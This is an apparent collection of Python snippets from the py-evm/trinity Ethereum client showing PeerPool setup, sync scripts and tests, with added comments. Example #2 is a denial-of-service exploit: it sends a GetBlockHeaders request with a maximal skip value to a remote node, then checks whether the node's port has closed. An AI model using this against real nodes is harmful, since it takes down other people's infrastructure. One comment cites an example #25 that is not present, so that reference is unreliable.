Example #1
 def __init__(
     self,
     privkey: datatypes.PrivateKey,
     server_address: Address,
     chaindb: AsyncChainDB,
     bootstrap_nodes: List[str],
     network_id: int,
     min_peers: int = DEFAULT_MIN_PEERS,
     peer_class: Type[BasePeer] = ETHPeer,
 ) -> None:
     self.cancel_token = CancelToken('Server')
     self.chaindb = chaindb
     self.privkey = privkey
     self.server_address = server_address
     self.network_id = network_id
     self.peer_class = peer_class
     # TODO: bootstrap_nodes should be looked up by network_id.
     discovery = DiscoveryProtocol(self.privkey,
                                   self.server_address,
                                   bootstrap_nodes=bootstrap_nodes)
     self.peer_pool = PeerPool(
         peer_class,
         self.chaindb,
         self.network_id,
         self.privkey,
         discovery,
         min_peers=min_peers,
     )
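
This constructor appears to come from the same Server class shown in full in Examples #18 and #25; it wires a DiscoveryProtocol into the PeerPool so the pool can source peers on its own. A hypothetical wiring sketch, assuming the example's imports are in scope (the address and chain values below are illustrative, not from the example):

privkey = ecies.generate_privkey()
server = Server(
    privkey,
    Address('0.0.0.0', 30303, 30303),   # kademlia.Address(ip, udp_port, tcp_port)
    chaindb,                            # an AsyncChainDB built elsewhere
    bootstrap_nodes=[],                 # per the TODO above: should be looked up by network_id
    network_id=RopstenChain.network_id,
)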
Example #2
def _exp(node_url, chain) -> None:

    from evm.chains.mainnet import MainnetChain, MAINNET_GENESIS_HEADER, MAINNET_VM_CONFIGURATION
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop

    ip, port = node_url.split('@')[1].split(':')
    if port_probe(ip, port):
        print('The port is open, starting to attack...')
    peer_class = LESPeer
    peer_pool = None
    if chain == 'mainnet':
        block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(MAINNET_GENESIS_HEADER)
        network_id = MainnetChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             MAINNET_VM_CONFIGURATION)
    elif chain == 'testnet':
        block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
        network_id = RopstenChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             ROPSTEN_VM_CONFIGURATION)
    loop = asyncio.get_event_loop()

    async def attack() -> None:
        nonlocal peer_pool
        nonlocal block_hash
        while not peer_pool.peers:
            print("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = cast(LESPeer, peer_pool.peers[0])
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id': 1,
            'query': GetBlockHeadersQuery(
                decode_hex(block_hash), 1, 0xffffffffffffffff, False),
        }
        header, body = cmd.encode(data)
        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        result = port_probe(ip, port)
        if not result:
            print('The port is closed, attack succeeded...')
            exit()

    t1 = asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    t2 = asyncio.ensure_future(attack())
    loop.set_debug(True)
    loop.run_until_complete(asyncio.wait([t1, t2]))
    loop.close()
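
Example #2 depends on a port_probe() helper that is not shown. A minimal sketch of what it presumably does, assuming a plain TCP connect test (this is a guess, not the original helper):

import socket

def port_probe(ip: str, port: str, timeout: float = 2.0) -> bool:
    # True when a TCP connection to (ip, port) can be established.
    try:
        with socket.create_connection((ip, int(port)), timeout=timeout):
            return True
    except OSError:
        return False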
Example #3
def _test() -> None:
    import argparse
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncLevelDB, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    db = FakeAsyncLevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(
        ETHPeer, chaindb, network_id, ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(chaindb, db, head.state_root, peer_pool)
    downloader.logger.setLevel(log_level)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    async def run() -> None:
        await downloader.run()
        downloader.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
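
Examples #3 and #4 share the same shutdown idiom: a SIGINT/SIGTERM handler sets an asyncio.Event, and a watcher coroutine tears the services down and stops the loop. Reduced to a standalone sketch (the service coroutine here is a stand-in, not code from the examples):

import asyncio
import signal

async def sleepy_service() -> None:
    # Stand-in for downloader.run() / peer_pool.run() above.
    while True:
        await asyncio.sleep(1)

def main() -> None:
    loop = asyncio.get_event_loop()
    sigint_received = asyncio.Event()
    for sig in (signal.SIGINT, signal.SIGTERM):
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        # The real examples cancel their services here before stopping.
        loop.stop()

    asyncio.ensure_future(sleepy_service())
    asyncio.ensure_future(exit_on_sigint())
    loop.run_forever()
    loop.close()

if __name__ == '__main__':
    main()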
Example #4
def _test() -> None:
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import ETHPeer, DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (FakeAsyncChainDB,
                                                    FakeAsyncRopstenChain,
                                                    connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(ETHPeer, chaindb, network_id, privkey,
                         ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
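
Example #4 also installs a ProcessPoolExecutor as the loop's default executor, so every run_in_executor(None, ...) call is offloaded to a worker process rather than a thread, which suits CPU-bound work. The mechanism in isolation (a self-contained sketch, not code from the example):

import asyncio
from concurrent.futures import ProcessPoolExecutor

def cpu_bound(n: int) -> int:
    # Pure-Python busy work that benefits from a separate process.
    return sum(i * i for i in range(n))

async def main() -> None:
    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())
    # Passing None selects the default executor installed above.
    result = await loop.run_in_executor(None, cpu_bound, 1_000_000)
    print(result)

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())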
Example #5
 def __init__(self, privkey: datatypes.PrivateKey, server_address: Address,
              chaindb: AsyncChainDB, bootstrap_nodes: List[str],
              network_id: int) -> None:
     self.cancel_token = CancelToken('Server')
     self.chaindb = chaindb
     self.privkey = privkey
     self.server_address = server_address
     self.network_id = network_id
     # TODO: bootstrap_nodes should be looked up by network_id.
     discovery = DiscoveryProtocol(self.privkey,
                                   self.server_address,
                                   bootstrap_nodes=bootstrap_nodes)
     self.peer_pool = PeerPool(ETHPeer, self.chaindb, self.network_id,
                               self.privkey, discovery)
Example #6
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, connect_to_peers_loop
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.state.StateDownloader').setLevel(log_level)

    db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(ETHPeer, chaindb, network_id,
                         ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(db, head.state_root, peer_pool)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(downloader.run())
    loop.run_forever()
    loop.close()
Example #7
async def test_peer_pool_connect(monkeypatch, event_loop,
                                 receiver_server_with_dumb_peer):
    started_peers = []

    async def mock_start_peer(peer):
        nonlocal started_peers
        started_peers.append(peer)

    monkeypatch.setattr(receiver_server_with_dumb_peer, '_start_peer',
                        mock_start_peer)
    # We need this to ensure the server can check if the peer pool is full for
    # incoming connections.
    monkeypatch.setattr(receiver_server_with_dumb_peer, 'peer_pool',
                        MockPeerPool())

    pool = PeerPool(DumbPeer, FakeAsyncHeaderDB(MemoryDB()), NETWORK_ID,
                    INITIATOR_PRIVKEY, tuple())
    nodes = [RECEIVER_REMOTE]
    await pool.connect_to_nodes(nodes)
    # Give the receiver_server a chance to ack the handshake.
    await asyncio.sleep(0.1)

    assert len(started_peers) == 1
    assert len(pool.connected_nodes) == 1

    # Stop our peer to make sure its pending asyncio tasks are cancelled.
    await list(pool.connected_nodes.values())[0].cancel()
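
The MockPeerPool used in Example #7 is not shown; given the comment about the server checking whether the pool is full, a minimal stand-in could look like this (an assumption about the fixture, not its actual definition):

class MockPeerPool:
    # Just enough surface for the server's incoming-connection capacity check.
    is_full = False
    connected_nodes: dict = {}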
Example #8
async def test_peer_pool_connect(monkeypatch, event_loop,
                                 receiver_server_with_dumb_peer):
    started_peers = []

    def mock_start_peer(peer):
        nonlocal started_peers
        started_peers.append(peer)

    monkeypatch.setattr(receiver_server_with_dumb_peer, '_start_peer',
                        mock_start_peer)

    network_id = 1
    discovery = None
    pool = PeerPool(DumbPeer, HeaderDB(MemoryDB()), network_id,
                    INITIATOR_PRIVKEY, discovery)
    nodes = [RECEIVER_REMOTE]
    await pool._connect_to_nodes(nodes)
    # Give the receiver_server a chance to ack the handshake.
    await asyncio.sleep(0.1)

    assert len(started_peers) == 1
    assert len(pool.connected_nodes) == 1

    # Stop our peer to make sure its pending asyncio tasks are cancelled.
    await list(pool.connected_nodes.values())[0].cancel()
Example #9
 def _create_peer_pool(self, chain_config: ChainConfig) -> PeerPool:
     return PeerPool(
         LESPeer,
         self.headerdb,
         chain_config.network_id,
         chain_config.nodekey,
         self.chain_class.vm_configuration,
     )
Example #10
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p import kademlia
    from p2p.constants import ROPSTEN_BOOTNODES
    from p2p.discovery import DiscoveryProtocol
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, LocalGethPeerPool
    logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
    logging.getLogger('p2p.chain.ChainSyncer').setLevel(logging.DEBUG)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    loop = asyncio.get_event_loop()
    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    privkey = ecies.generate_privkey()
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb, RopstenChain.network_id, privkey)
        discovery = None
    else:
        listen_host = '0.0.0.0'
        listen_port = 30303
        addr = kademlia.Address(listen_host, listen_port, listen_port)
        discovery = DiscoveryProtocol(privkey, addr, ROPSTEN_BOOTNODES)
        loop.run_until_complete(discovery.create_endpoint())
        print("Bootstrapping discovery service...")
        loop.run_until_complete(discovery.bootstrap())
        peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id, privkey, discovery)

    asyncio.ensure_future(peer_pool.run())
    downloader = ChainSyncer(chaindb, peer_pool)
    # On ROPSTEN the discovery table is usually full of bad peers so we can't require too many
    # peers in order to sync.
    downloader.min_peers_to_sync = 1

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()
        if discovery is not None:
            discovery.stop()
            # Give any pending discovery tasks some time to finish.
            await asyncio.sleep(2)

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)
    loop.run_until_complete(run())
    loop.close()
Example #11
 def _make_peer_pool(self) -> PeerPool:
     # This method exists only so that ShardSyncer can provide a different implementation.
     return PeerPool(
         self.peer_class,
         self.headerdb,
         self.network_id,
         self.privkey,
         self.chain.vm_configuration,
         max_peers=self.max_peers,
     )
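
Examples #9 and #11 both hide PeerPool construction behind a small factory method so that a subclass can swap in a different pool without touching callers (Example #11's comment names ShardSyncer as the motivation). The pattern in isolation, with hypothetical class and attribute names:

class BaseSyncService:
    def _make_peer_pool(self) -> PeerPool:
        return PeerPool(self.peer_class, self.headerdb, self.network_id,
                        self.privkey, self.vm_configuration)

class ShardSyncService(BaseSyncService):
    def _make_peer_pool(self) -> PeerPool:
        # The override point: callers keep calling _make_peer_pool().
        return ShardingPeerPool(self.peer_class, self.network_id, self.privkey)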
Example #12
def _test():
    import argparse
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash',
                        type=str,
                        required=True,
                        help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id,
                         ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
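
Given its argparse setup, Example #12 would be invoked along these lines (the module name, path, and hash are placeholders):

#   python <module> -db /path/to/statedb -root-hash 0x<hex-encoded-state-root>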
Example #13
def run_networking_process(chain_config, sync_mode):
    class DBManager(BaseManager):
        pass

    DBManager.register('get_db', proxytype=DBProxy)
    DBManager.register('get_chaindb', proxytype=ChainDBProxy)

    manager = DBManager(address=chain_config.database_ipc_path)
    manager.connect()

    chaindb = manager.get_chaindb()

    if not is_data_dir_initialized(chain_config):
        # TODO: this will only work as is for chains with known genesis
        # parameters.  Need to flesh out how genesis parameters for custom
        # chains are defined and passed around.
        initialize_data_dir(chain_config)

    if not is_database_initialized(chaindb):
        initialize_database(chain_config, chaindb)

    chain_class = get_chain_protocol_class(chain_config, sync_mode=sync_mode)
    peer_pool = PeerPool(LESPeer, chaindb, chain_config.network_id,
                         chain_config.nodekey)

    async def run():
        try:
            asyncio.ensure_future(peer_pool.run())
            # chain.run() will run in a loop until our atexit handler is called, at which point it returns
            # and we cleanly stop the pool and chain.
            await chain.run()
        finally:
            await peer_pool.stop()
            await chain.stop()

    chain = chain_class(chaindb, peer_pool)

    loop = asyncio.get_event_loop()

    try:
        loop.run_until_complete(run())
    except KeyboardInterrupt:
        pass

    def cleanup():
        # This is to instruct chain.run() to exit, which will cause the event loop to stop.
        chain.cancel_token.trigger()

        loop.close()

    atexit.register(cleanup)
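
Example #13's DBManager hands out database proxies over an IPC socket, letting the networking process use a database owned by a separate database process. The same multiprocessing.managers mechanics in miniature (KVStore, the socket path, and the authkey are hypothetical):

from multiprocessing.managers import BaseManager

class KVStore:
    """Toy stand-in for the database owned by the db process."""
    def __init__(self) -> None:
        self._data: dict = {}

    def get(self, key):
        return self._data.get(key)

    def set(self, key, value):
        self._data[key] = value

class DBManager(BaseManager):
    pass

if __name__ == '__main__':
    # Database process: expose one shared KVStore under the 'get_db' typeid.
    store = KVStore()
    DBManager.register('get_db', callable=lambda: store)
    manager = DBManager(address='/tmp/db.ipc', authkey=b'trinity')
    manager.get_server().serve_forever()

# A client process mirrors the registration, then connects:
#   DBManager.register('get_db')
#   manager = DBManager(address='/tmp/db.ipc', authkey=b'trinity')
#   manager.connect()
#   db = manager.get_db()   # a proxy; method calls travel over the socket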
Example #14
def _test():
    import argparse
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-root-hash', type=str, required=True, help='Hex encoded root hash')
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(MemoryDB())
    chaindb.persist_header_to_db(ROPSTEN_GENESIS_HEADER)
    peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id, ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    state_db = LevelDB(args.db)
    root_hash = decode_hex(args.root_hash)
    downloader = StateDownloader(state_db, root_hash, peer_pool)
    loop = asyncio.get_event_loop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Example #15
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, LocalGethPeerPool
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')
    logging.getLogger('p2p.chain.ChainSyncer').setLevel(logging.DEBUG)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb,
                                      RopstenChain.network_id,
                                      ecies.generate_privkey())
    else:
        peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id,
                             ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    downloader = ChainSyncer(chaindb, peer_pool)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop = asyncio.get_event_loop()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)
    loop.run_until_complete(run())
    loop.close()
Example #16
parser.add_argument('-debug', action='store_true')
args = parser.parse_args()

print("Logging to", LOGFILE)
if args.debug:
    LOGLEVEL = logging.DEBUG
logging.basicConfig(level=LOGLEVEL, filename=LOGFILE)

DemoLightChain = LightChain.configure(
    name='Demo LightChain',
    vm_configuration=MAINNET_VM_CONFIGURATION,
    network_id=ROPSTEN_NETWORK_ID,
)

chaindb = ChainDB(LevelDB(args.db))
peer_pool = PeerPool(LESPeer, chaindb, ROPSTEN_NETWORK_ID,
                     ecies.generate_privkey())
try:
    chaindb.get_canonical_head()
except CanonicalHeadNotFound:
    # We're starting with a fresh DB.
    chain = DemoLightChain.from_genesis_header(chaindb, ROPSTEN_GENESIS_HEADER,
                                               peer_pool)
else:
    # We're reusing an existing db.
    chain = DemoLightChain(chaindb, peer_pool)


async def run():
    asyncio.ensure_future(peer_pool.run())
    # chain.run() will run in a loop until our atexit handler is called, at which point it returns
    # and we cleanly stop the pool and chain.
Example #17
def p2p_server(monkeypatch, jsonrpc_ipc_pipe_path):
    monkeypatch.setattr(Server, '_make_peer_pool',
                        lambda s: PeerPool(None, None, None, None, None, None))
    return Server(None, None, None, None, None, None, None)
Example #18
class Server(BaseService):
    """Server listening for incoming connections"""
    logger = logging.getLogger("p2p.server.Server")
    _server = None

    def __init__(
        self,
        privkey: datatypes.PrivateKey,
        server_address: Address,
        chaindb: AsyncChainDB,
        bootstrap_nodes: List[str],
        network_id: int,
        min_peers: int = DEFAULT_MIN_PEERS,
        peer_class: Type[BasePeer] = ETHPeer,
    ) -> None:
        super().__init__(CancelToken('Server'))
        self.chaindb = chaindb
        self.privkey = privkey
        self.server_address = server_address
        self.network_id = network_id
        self.peer_class = peer_class
        # TODO: bootstrap_nodes should be looked up by network_id.
        self.discovery = DiscoveryProtocol(self.privkey,
                                           self.server_address,
                                           bootstrap_nodes=bootstrap_nodes)
        self.peer_pool = PeerPool(
            peer_class,
            self.chaindb,
            self.network_id,
            self.privkey,
            self.discovery,
            min_peers=min_peers,
        )

    async def refresh_nat_portmap(self) -> None:
        """Run an infinite loop refreshing our NAT port mapping.

        On every iteration we configure the port mapping with a lifetime of 30 minutes and then
        sleep for that long as well.
        """
        lifetime = 30 * 60
        while not self.is_finished:
            self.logger.info("Setting up NAT portmap...")
            # This is experimental and it's OK if it fails, hence the broad exception handler.
            try:
                await self._add_nat_portmap(lifetime)
            except Exception as e:
                if (isinstance(e, upnpclient.soap.SOAPError)
                        and e.args == (718, 'ConflictInMappingEntry')):
                    # An entry already exists with the parameters we specified. Maybe the router
                    # didn't clean it up after it expired or it has been configured by other piece
                    # of software, either way we should not override it.
                    # https://tools.ietf.org/id/draft-ietf-pcp-upnp-igd-interworking-07.html#errors
                    self.logger.info(
                        "NAT port mapping already configured, not overriding it"
                    )
                else:
                    self.logger.exception("Failed to setup NAT portmap")

            try:
                await wait_with_token(asyncio.sleep(lifetime),
                                      token=self.cancel_token)
            except OperationCancelled:
                break

    async def _add_nat_portmap(self, lifetime: int) -> None:
        loop = asyncio.get_event_loop()
        # Use loop.run_in_executor() because upnpclient.discover() is blocking and may take a
        # while to complete.
        devices = await wait_with_token(
            loop.run_in_executor(None, upnpclient.discover),
            token=self.cancel_token,
            timeout=2 * REPLY_TIMEOUT,
        )
        if not devices:
            self.logger.info("No UPNP-enabled devices found")
            return
        device = devices[0]
        device.WANIPConn1.AddPortMapping(
            NewRemoteHost=device.WANIPConn1.GetExternalIPAddress()['NewExternalIPAddress'],
            NewExternalPort=self.server_address.tcp_port,
            NewProtocol='TCP',
            NewInternalPort=self.server_address.tcp_port,
            NewInternalClient=self.server_address.ip,
            NewEnabled='1',
            NewPortMappingDescription='Created by Py-EVM',
            NewLeaseDuration=lifetime)
        self.logger.info("NAT port forwarding successfully setup")

    async def _start(self) -> None:
        self._server = await asyncio.start_server(
            self.receive_handshake,
            host=self.server_address.ip,
            port=self.server_address.tcp_port,
        )

    async def _close(self) -> None:
        self._server.close()
        await self._server.wait_closed()

    async def _run(self) -> None:
        self.logger.info("Running server...")
        await self._start()
        self.logger.info(
            "enode://%s@%s:%s",
            self.privkey.public_key.to_hex()[2:],
            self.server_address.ip,
            self.server_address.tcp_port,
        )
        await self.discovery.create_endpoint()
        asyncio.ensure_future(self.refresh_nat_portmap())
        asyncio.ensure_future(self.discovery.bootstrap())
        asyncio.ensure_future(self.peer_pool.run())
        await self.cancel_token.wait()

    async def _cleanup(self) -> None:
        self.logger.info("Closing server...")
        await self.peer_pool.cancel()
        await self.discovery.stop()
        await self._close()

    async def receive_handshake(self, reader: asyncio.StreamReader,
                                writer: asyncio.StreamWriter) -> None:
        expected_exceptions = (TimeoutError, PeerConnectionLost,
                               HandshakeFailure, asyncio.IncompleteReadError,
                               ConnectionResetError, BrokenPipeError)
        try:
            await self._receive_handshake(reader, writer)
        except expected_exceptions as e:
            self.logger.debug("Could not complete handshake", exc_info=True)
        except OperationCancelled:
            pass
        except Exception as e:
            self.logger.exception("Unexpected error handling handshake")

    async def _receive_handshake(self, reader: asyncio.StreamReader,
                                 writer: asyncio.StreamWriter) -> None:
        msg = await wait_with_token(
            reader.read(ENCRYPTED_AUTH_MSG_LEN),
            token=self.cancel_token,
            timeout=REPLY_TIMEOUT,
        )

        ip, socket, *_ = writer.get_extra_info("peername")
        remote_address = Address(ip, socket)
        self.logger.debug("Receiving handshake from %s", remote_address)
        try:
            ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                msg, self.privkey)
        except DecryptionError:
            # Try to decode as EIP8
            msg_size = big_endian_to_int(msg[:2])
            remaining_bytes = msg_size - ENCRYPTED_AUTH_MSG_LEN + 2
            msg += await wait_with_token(
                reader.read(remaining_bytes),
                token=self.cancel_token,
                timeout=REPLY_TIMEOUT,
            )
            try:
                ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                    msg, self.privkey)
            except DecryptionError as e:
                self.logger.warning("Failed to decrypt handshake", exc_info=True)
                return

        # Create `HandshakeResponder(remote: kademlia.Node, privkey: datatypes.PrivateKey)` instance
        initiator_remote = Node(initiator_pubkey, remote_address)
        responder = HandshakeResponder(initiator_remote, self.privkey,
                                       self.cancel_token)

        # Call `HandshakeResponder.create_auth_ack_message(nonce: bytes)` to create the reply
        responder_nonce = secrets.token_bytes(HASH_LEN)
        auth_ack_msg = responder.create_auth_ack_message(nonce=responder_nonce)
        auth_ack_ciphertext = responder.encrypt_auth_ack_message(auth_ack_msg)

        # Use the `writer` to send the reply to the remote
        writer.write(auth_ack_ciphertext)
        await writer.drain()

        # Call `HandshakeResponder.derive_shared_secrets()` and use return values to create `Peer`
        aes_secret, mac_secret, egress_mac, ingress_mac = responder.derive_secrets(
            initiator_nonce=initiator_nonce,
            responder_nonce=responder_nonce,
            remote_ephemeral_pubkey=ephem_pubkey,
            auth_init_ciphertext=msg,
            auth_ack_ciphertext=auth_ack_ciphertext)

        # Create and register peer in peer_pool
        peer = self.peer_class(remote=initiator_remote,
                               privkey=self.privkey,
                               reader=reader,
                               writer=writer,
                               aes_secret=aes_secret,
                               mac_secret=mac_secret,
                               egress_mac=egress_mac,
                               ingress_mac=ingress_mac,
                               chaindb=self.chaindb,
                               network_id=self.network_id)

        await self.do_handshake(peer)

    async def do_handshake(self, peer: BasePeer) -> None:
        await peer.do_p2p_handshake()
        await peer.do_sub_proto_handshake()
        self.peer_pool.start_peer(peer)
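
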